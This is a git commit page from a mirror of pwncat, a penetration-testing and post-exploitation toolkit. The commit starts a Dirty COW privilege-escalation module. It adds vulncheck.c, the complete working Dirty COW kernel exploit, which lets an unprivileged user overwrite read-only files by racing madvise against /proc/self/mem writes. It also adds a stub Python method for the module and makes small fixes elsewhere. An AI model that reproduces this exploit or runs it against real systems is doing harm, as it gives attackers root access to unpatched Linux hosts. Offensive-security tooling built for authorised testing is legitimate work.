Saverr/pwncat
1
0
Fork 0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-24 01:25:37 +01:00
Code Projects Releases Wiki Activity

Started the process for dirtcow

Browse Source
This commit is contained in:
John Hammond 2020-05-10 01:21:27 -04:00
parent 72ba1b093b
commit 7a3c4f3bb4
4 changed files with 55 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
data/dirtycow/vulncheck.c Normal file
View File

@ -0,0 +1,9 @@
#include<stdio.h>
#include<sys/mman.h>
#include<fcntl.h>
#include<pthread.h>
#include<unistd.h>
#include<sys/stat.h>
#include<string.h>
#include<stdint.h>
void*map;int f;struct stat st;char*name;void*madviseThread(void*arg){char*str;str=(char*)arg;int i,c=0;for(i=0;i<100000000;i++){c+=madvise(map,100,MADV_DONTNEED);}printf("madvise%d\n\n",c);}void*procselfmemThread(void*arg){char*str;str=(char*)arg;int f=open("/proc/self/mem",O_RDWR);int i,c=0;for(i=0;i<100000000;i++){lseek(f,(uintptr_t)map,SEEK_SET);c+=write(f,str,strlen(str));}printf("procselfmem%d\n\n",c);}int main(int argc,char*argv[]){if(argc<3){(void)fprintf(stderr,"%s\n","usage: dirtyc0w target_file new_content");return 1;}pthread_t pth1,pth2;f=open(argv[1],O_RDONLY);fstat(f,&st);name=argv[1];map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);printf("mmap%zx\n\n",(uintptr_t)map);pthread_create(&pth1,NULL,madviseThread,argv[1]);pthread_create(&pth2,NULL,procselfmemThread,argv[2]);pthread_join(pth1,NULL);pthread_join(pth2,NULL);return 0;}

43
pwncat/privesc/dirtycow.py Normal file
View File

@ -0,0 +1,43 @@
#!/usr/bin/env python3
from typing import Generator, List
import shlex
import sys
from time import sleep
import os
from colorama import Fore, Style
import socket
from io import StringIO, BytesIO
import functools
from pwncat.util import CTRL_C
from pwncat.privesc.base import Method, PrivescError, Technique
from pwncat.file import RemoteBinaryPipe
from pwncat.pysudoers import Sudoers
from pwncat import gtfobins
from pwncat.privesc import Capability
from pwncat import util
class DirtycowMethod(Method):
name = "dirtycow"
BINARIES = ["gcc"]
def __init__(self, pty: "pwncat.pty.PtyHandler"):
super(DirtycowMethod, self).__init__(pty)
def enumerate(self, capability: int = Capability.ALL) -> List[Technique]:
""" Find all techniques known at this time """
# Test if this kernel version is vulnerable to dirtycow
return NotImplemented("this function is not yet written")
def execute(self, technique: Technique):
""" Run the specified technique """
# actually perform dirtycow
return NotImplemented("this function is not yet written")

12
pwncat/privesc/sudo.py
View File

@ -138,14 +138,6 @@ class SudoMethod(Method):
tag = " ".join(tags_split[1:])
command = commands["command"]
# success(
# f"user {Fore.GREEN}{current_user['name']}{Fore.RESET} can run "
# + f"{Fore.YELLOW}{command}{Fore.RESET} "
# + f"as user {Fore.BLUE}{run_as_user}{Fore.RESET} "
# + f"with {Fore.BLUE}{tag}{Fore.RESET}",
# overlay=True,
# )
if "NOPASSWD" in tag:
sudo_no_password.append(
{
@ -181,9 +173,7 @@ class SudoMethod(Method):
# The PtyHandler.which method is used to verify the presence of
# different GTFObins on the remote system when an "ALL" spec is
# found.
# sudo_privesc["command"], binary = gtfobins.Binary.find_sudo(
# sudo_privesc["command"], self.pty.which
# )
binaries = gtfobins.Binary.find_sudo(
sudo_privesc["command"], self.pty.which, capability
)

5
pwncat/pty.py
View File

@ -791,7 +791,6 @@ class PtyHandler:
""" Reset the remote terminal (calls sync, reset, and sets PS1) """
self.reset()
self.do_sync([])
print(self.id())
def run(self, cmd, wait=True, input: bytes = b"") -> bytes:
""" Run a command in the context of the remote host and return the
@ -985,9 +984,9 @@ class PtyHandler:
@property
def id(self):
id_output = self.run("id")
id_output = self.run("id").decode("utf-8")
pieces = id_output.split(" ").decode("utf-8")
pieces = id_output.split(" ")
props = {}
for p in pieces:
segments = p.split("=")